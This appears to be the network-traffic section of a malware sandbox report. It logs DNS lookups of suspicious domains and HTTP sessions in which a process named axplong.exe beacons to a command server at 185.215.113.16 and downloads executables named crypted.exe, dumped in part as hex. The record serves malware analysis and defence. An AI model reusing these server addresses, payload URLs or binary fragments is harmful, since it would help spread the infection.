Aug 31, 2024 15:44:21.606519938 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606528044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606542110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606551886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606556892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606566906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606585979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606646061 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:21.606730938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606760025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606802940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606822014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606833935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606847048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606863976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606870890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606873989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606884003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.606890917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.606930971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.607924938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.607934952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.607985973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.607997894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608009100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608028889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608041048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608046055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.608053923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608066082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.608069897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608092070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.608109951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.608119011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608130932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608148098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608159065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608160019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.608170033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608180046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608187914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.608191013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.608217955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.608242035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.609647989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609663963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609674931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609684944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609694958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609705925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609705925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.609724045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609735012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609745026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609755993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609757900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.609766006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.609771967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609782934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609793901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609795094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.609805107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609817982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.609822035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.609846115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.609863043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.611942053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.611953020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.611963987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.611974001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.611984968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.611999989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.612005949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.612015009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.612025976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.612051010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.612078905 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.612653971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.612663984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.612710953 CEST	49727	80	192.168.2.5	52.212.52.84

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 31, 2024 15:44:04.347310066 CEST	192.168.2.5	1.1.1.1	0xfb0f	Standard query (0)	ddl.safone.dev	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:32.989497900 CEST	192.168.2.5	1.1.1.1	0x36ab	Standard query (0)	femininedspzmhu.shop	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:34.124672890 CEST	192.168.2.5	1.1.1.1	0x9442	Standard query (0)	locatedblsoqp.shop	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:35.035717964 CEST	192.168.2.5	1.1.1.1	0xddaf	Standard query (0)	traineiwnqo.shop	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:35.682337999 CEST	192.168.2.5	1.1.1.1	0xd903	Standard query (0)	cgil.in	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:51.406210899 CEST	192.168.2.5	1.1.1.1	0x411f	Standard query (0)	jirafasaltas.fun	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:56.414895058 CEST	192.168.2.5	1.1.1.1	0xb200	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:56.418597937 CEST	192.168.2.5	1.1.1.1	0xb0	Standard query (0)	IuUBYrPCAO.IuUBYrPCAO	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:45:00.879633904 CEST	192.168.2.5	1.1.1.1	0x5620	Standard query (0)	evoliutwoqm.shop	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:45:05.317342043 CEST	192.168.2.5	1.1.1.1	0x3638	Standard query (0)	tmpfiles.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 31, 2024 15:44:04.369930983 CEST	1.1.1.1	192.168.2.5	0xfb0f	No error (0)	ddl.safone.dev	cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 15:44:04.369930983 CEST	1.1.1.1	192.168.2.5	0xfb0f	No error (0)	cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com		52.212.52.84	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:04.369930983 CEST	1.1.1.1	192.168.2.5	0xfb0f	No error (0)	cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com		54.247.69.169	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:04.369930983 CEST	1.1.1.1	192.168.2.5	0xfb0f	No error (0)	cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com		63.32.161.232	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:33.002301931 CEST	1.1.1.1	192.168.2.5	0x36ab	No error (0)	femininedspzmhu.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:33.002301931 CEST	1.1.1.1	192.168.2.5	0x36ab	No error (0)	femininedspzmhu.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:34.131731987 CEST	1.1.1.1	192.168.2.5	0x9442	No error (0)	locatedblsoqp.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:34.131731987 CEST	1.1.1.1	192.168.2.5	0x9442	No error (0)	locatedblsoqp.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:35.049824953 CEST	1.1.1.1	192.168.2.5	0xddaf	No error (0)	traineiwnqo.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:35.049824953 CEST	1.1.1.1	192.168.2.5	0xddaf	No error (0)	traineiwnqo.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:36.004743099 CEST	1.1.1.1	192.168.2.5	0xd903	No error (0)	cgil.in		69.57.172.44	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:51.421542883 CEST	1.1.1.1	192.168.2.5	0x411f	No error (0)	jirafasaltas.fun		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:51.421542883 CEST	1.1.1.1	192.168.2.5	0x411f	No error (0)	jirafasaltas.fun		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:56.510471106 CEST	1.1.1.1	192.168.2.5	0xb200	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:56.510471106 CEST	1.1.1.1	192.168.2.5	0xb200	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:56.510471106 CEST	1.1.1.1	192.168.2.5	0xb200	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:56.510471106 CEST	1.1.1.1	192.168.2.5	0xb200	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:56.510471106 CEST	1.1.1.1	192.168.2.5	0xb200	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:44:56.510482073 CEST	1.1.1.1	192.168.2.5	0xb0	Name error (3)	IuUBYrPCAO.IuUBYrPCAO	none	none	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:45:00.951728106 CEST	1.1.1.1	192.168.2.5	0x5620	Server failure (2)	evoliutwoqm.shop	none	none	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:45:05.327235937 CEST	1.1.1.1	192.168.2.5	0x3638	No error (0)	tmpfiles.org		104.21.21.16	A (IP address)	IN (0x0001)	false
Aug 31, 2024 15:45:05.327235937 CEST	1.1.1.1	192.168.2.5	0x3638	No error (0)	tmpfiles.org		172.67.195.247	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:03.186487913 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:44:04.047657013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:44:04.049952984 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:44:04.327761889 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 39 35 0d 0a 20 3c 63 3e 31 30 30 30 30 30 32 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 65 61 61 31 30 65 34 34 62 37 63 63 30 62 32 36 62 31 64 36 30 39 62 32 34 31 39 62 33 34 63 63 66 35 66 38 62 62 37 32 61 61 61 62 62 35 62 30 35 38 37 32 66 65 66 30 36 33 37 37 33 63 64 61 36 36 39 36 30 35 64 34 62 38 37 61 62 34 63 32 38 38 66 31 33 37 62 65 39 31 65 34 23 31 30 30 30 30 30 34 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 32 30 65 65 65 34 65 61 61 37 34 66 36 66 65 66 61 61 36 33 36 62 37 37 23 31 30 30 30 30 30 35 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 36 64 62 33 34 62 31 61 38 62 64 65 37 33 31 66 37 62 33 66 66 61 62 34 66 23 31 30 30 30 30 36 36 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 [TRUNCATED] Data Ascii: 495 <c>1000002001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5f8bb72aaabb5b05872fef063773cda669605d4b87ab4c288f137be91e4#1000004001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a720eee4eaa74f6fefaa636b77#1000005001+++aa0ed36554e19fbffd5744f69c5867ee8214f816db34b1a8bde731f7b3ffab4f#1000066001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a730e8f8fbbf4954eae1607267d36ac114d9a16c#1000129001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5f8bf76afadb5b04b6efded737e3fd673925dd9f46ab392b9e41389b8e72fd609abb356104967348c9c111eb5b6bd#1000191001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a701f5e9f9bc4365cdeb74763cda6696#1000209001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5fabb7aa4adb5a44262fae16e7660d0779d14d9a16ce397a8e51ec78aef1cbc0695#1000223001+++aa0ed3651df49fa1a60503a8830427f0c053b9568c7c9ae2a5f826f2ebeabd1b39a0e17e76#1000228001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5f9b876ada8b5835f79ebd77f7d71f670804e92bc71b9c0a1f70592f6c93ab928a584#1000234001+++aa [TRUNCATED]
Aug 31, 2024 15:44:04.327775955 CEST	128	IN	Data Raw: 33 61 39 61 37 33 31 65 39 66 33 65 65 62 61 34 37 36 65 61 30 65 31 37 65 37 36 23 31 30 30 30 32 33 38 30 30 32 2b 2b 2b 65 33 31 32 64 33 36 31 31 65 66 34 39 66 61 31 66 34 35 61 35 66 65 61 39 66 35 63 37 63 66 31 38 32 31 36 65 35 30 61 64 Data Ascii: 3a9a731e9f3eeba476ea0e17e76#1000238002+++e312d3611ef49fa1f45a5fea9f5c7cf18216e50adc2dd0a4a4eb6cddf0fbb74f7efdaa636b77#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	52.212.52.84	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:04.383390903 CEST	71	OUT	GET /3823166/crypted.exe?hash=AgADZl HTTP/1.1 Host: ddl.safone.dev
Aug 31, 2024 15:44:05.008780003 CEST	835	IN	HTTP/1.1 200 OK Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725111844&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=E5zvuyLu1YfrVd489PkYSJlS84RdBIZ3j1BrrRrr5jo%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725111844&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=E5zvuyLu1YfrVd489PkYSJlS84RdBIZ3j1BrrRrr5jo%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: keep-alive Content-Type: application/x-msdownload Range: bytes=0-322047 Content-Range: bytes 0-322047/322048 Content-Disposition: attachment; filename="crypted.exe" Accept-Ranges: bytes Content-Length: 322048 Date: Sat, 31 Aug 2024 13:44:04 GMT Server: Python/3.8 aiohttp/3.9.3 Via: 1.1 vegur
Aug 31, 2024 15:44:05.043675900 CEST	1236	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`f @ @_`
Aug 31, 2024 15:44:05.043689013 CEST	1236	IN	Data Raw: 20 22 1e d8 80 30 c2 78 6b 1b d6 5f 39 be 9b 23 52 16 e8 df 50 7a 05 cd e0 47 c8 17 e5 fa 65 bf 90 1c a6 79 0f 15 d9 4a 4d bd 18 7e a5 98 c3 c3 17 47 8e 34 13 bb 2a 21 3d 93 20 90 89 61 1e e4 aa 1c 8a 6a 23 67 54 e1 ad 5c 8e b4 ab 3d 8b c2 83 cb Data Ascii: "0xk_9#RPzGeyJM~G4!= aj#gT\=rT)]qjj'$r~Sa_@I/G}"NuKdTa(&%:yh#,pV-Bk:=;rGk:'Xr%4Vi3&}U
Aug 31, 2024 15:44:05.043699980 CEST	448	IN	Data Raw: 94 e0 2e b2 8f 8c cb bf e5 dd 11 38 64 48 19 73 4a 9c b6 eb 74 0a e9 be 5a ca 07 56 70 d6 55 1f 36 6c a1 19 87 46 73 9d 0d c4 1e 5d 7a b7 8d 55 09 b6 87 a5 61 84 7c 6b be 0d a5 d3 63 5c 10 e6 b9 50 a0 e7 59 3d 92 76 4e 72 30 1f c4 6f 76 d5 04 8b Data Ascii: .8dHsJtZVpU6lFs]zUa\|kc\PY=vNr0ovAb;>[Y)0d[UY`>wm+.9YqAdbJE/1"VccJa>*h\aNp]R h;.gYnlWF +]>PR+]aqe(w}
Aug 31, 2024 15:44:05.043829918 CEST	1236	IN	Data Raw: 7b 43 93 f4 36 98 f2 53 2f 56 c2 33 0b 23 c9 3e 81 b0 f9 d8 8d 64 e7 bd 53 5d c1 11 01 51 3e 09 bd 32 dc cf 3f 6f 45 e2 ae 09 0e 6b 1d 39 f0 49 97 db 7c 7e f9 83 9e 08 3d ac fe bd 29 86 9b 37 10 99 14 52 9f 7b 41 b9 d8 fe 01 e9 a4 86 fc c6 82 c0 Data Ascii: {C6S/V3#>dS]Q>2?oEk9I\|~=)7R{AD>jE<t*2\5\|PHL'T>iowT?^X?6kkHDCQt;F$Eq4.Ck~\+i}h2n?=NhkrmI/^
Aug 31, 2024 15:44:05.043848991 CEST	1236	IN	Data Raw: 69 ec 95 5f dc 06 cf c0 c6 45 d6 54 c7 42 09 b5 d0 a3 b0 d6 8f 23 0b 93 4f 6c 90 0c bb f1 87 bc 0a 78 fc c6 09 83 ee 83 19 c8 ea b1 a8 77 bf cc 7d 06 1a 60 66 cb 25 4f 3c 9a a3 81 61 fd 06 c4 62 a6 2d 0e bf 8a 83 22 51 c3 dd cc c7 ae f8 86 13 22 Data Ascii: i_ETB#Olxw}`f%O<ab-"Q"n[?wQ!B2N`e=;JAt^=N(TPl _ogxU%c_9S{OgeCNPI<8sN&lq,.m\|!01t(
Aug 31, 2024 15:44:05.043859959 CEST	1236	IN	Data Raw: fe ed f6 1a c5 c0 89 af 1d e1 46 ea 4c 75 2c de 4c fd b4 f4 56 d4 58 1b 3d 2d d3 f7 32 90 91 37 32 39 8e f3 b1 ac 96 20 63 21 e3 f6 b6 84 c1 79 3d a8 19 8f 9c 0c 14 72 1c 5d ca 7e 0b a7 c3 d0 bb 95 38 43 df 67 0a ce 38 78 60 96 6d 89 c7 86 c3 35 Data Ascii: FLu,LVX=-2729 c!y=r]~8Cg8x`m5,KGM3=>#~:)eLc4$z7]QOxdFlc/~"kD-GmTNA@sWutl?Qn_rN/!rqDXa$IO(e&"l`t1zOK7
Aug 31, 2024 15:44:05.043869019 CEST	1236	IN	Data Raw: 49 4c ee 01 96 5e 52 28 ac 75 4a ef 7b d7 c4 55 fd 2d cd 8a db 80 55 9a 7c db eb 15 1e f0 c4 6d fa 42 50 fc 91 22 72 06 bd b0 dd f2 58 c7 c6 bd 4c 2e 36 19 db 70 4f 4e c4 04 48 86 0d f3 d6 81 ee 64 71 7e 8d 9d df b3 d1 29 b5 fa 02 9e e3 f2 48 78 Data Ascii: IL^R(uJ{U-U\|mBP"rXL.6pONHdq~)Hx4b*U9~s7d3S4p(&v.#17-P\9Sdm\|`>#{6_`1H\|6M%;S- @D&6;Fr^ReL
Aug 31, 2024 15:44:05.043880939 CEST	1236	IN	Data Raw: df e1 6e b5 d5 51 88 fa ae 41 92 7d bf 38 f5 81 21 28 5a 9a 1a 75 d2 4d 72 a1 f9 5d 99 f3 64 f9 2a 4f f3 42 0d 69 8a f3 c7 18 a8 13 71 88 ca f3 3b 58 15 71 93 bd 9a b3 c4 3f 6b 41 d4 15 60 28 9b fd f5 14 44 d5 fb 27 4d fa 4c bb fe 62 3a 08 83 e4 Data Ascii: nQA}8!(ZuMr]d*OBiq;Xq?kA`(D'MLb:pqB`p7w>YnAc"m!8\|([L@%J^S0'37+Sj,R{~s3\|IObl$3LZlKMZGy#Wd2d~_uI0"u
Aug 31, 2024 15:44:05.043891907 CEST	1236	IN	Data Raw: 56 45 51 28 44 97 bd 91 9a 7d 1e 96 d3 16 d8 ac 73 fd 63 69 e0 d6 ff 55 85 90 9c 62 4b b6 4e d3 97 81 a6 57 f9 9d d2 a4 7c 56 98 7c 6a e9 a2 a9 52 6d ba 29 7c 21 ca 80 9a 0c 57 69 25 2a cc 98 b3 c8 86 1f 17 aa 7c 90 0c ed b7 fd b0 fa 23 b2 c7 2c Data Ascii: VEQ(D}sciUbKNW\|V\|jRm)\|!Wi%*\|#,8d:\8+BV~$lGIxC%<n[c7,F-~~MYcSv>d2)-PC=I^>5?lm!:Mjc]soZ@K+l%
Aug 31, 2024 15:44:05.044509888 CEST	1236	IN	Data Raw: 3b f1 12 35 53 45 8b 47 1b 93 b1 f5 9e fe be 2e 44 b0 d3 21 16 b2 9f d1 19 5d 32 e2 e3 a6 ad dc 8b d6 30 da e4 af d0 2b 3a 57 ee 21 c8 d7 f1 22 34 ff 39 86 94 18 cf d3 7f 12 28 1c 7f 13 2d 6b bf 75 ee 39 4e c3 90 44 65 12 f7 1a 46 a5 d8 aa 12 d4 Data Ascii: ;5SEG.D!]20+:W!"49(-ku9NDeF<kfhGW_;zO>XPWu\jOmfJ;k/8JC7hR5x:bB~DD>2m>mz++-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:06.066993952 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Aug 31, 2024 15:44:06.807651997 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 31, 2024 15:44:06.809034109 CEST	56	OUT	GET /inc/crypteda.exe HTTP/1.1 Host: 185.215.113.16
Aug 31, 2024 15:44:07.048937082 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:06 GMT Content-Type: application/octet-stream Content-Length: 1104936 Last-Modified: Mon, 19 Aug 2024 12:56:48 GMT Connection: keep-alive ETag: "66c34110-10dc28" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c 08 c3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ac 10 00 00 08 00 00 00 00 00 00 1e ca 10 00 00 20 00 00 00 e0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 11 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc c9 10 00 4f 00 00 00 00 e0 10 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 b6 10 00 28 26 00 00 00 00 11 00 0c 00 00 00 94 c8 10 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL\f @ `O(& H.text$ `.rsrc@@.reloc@BHLvlTp#E'&@cCtE% 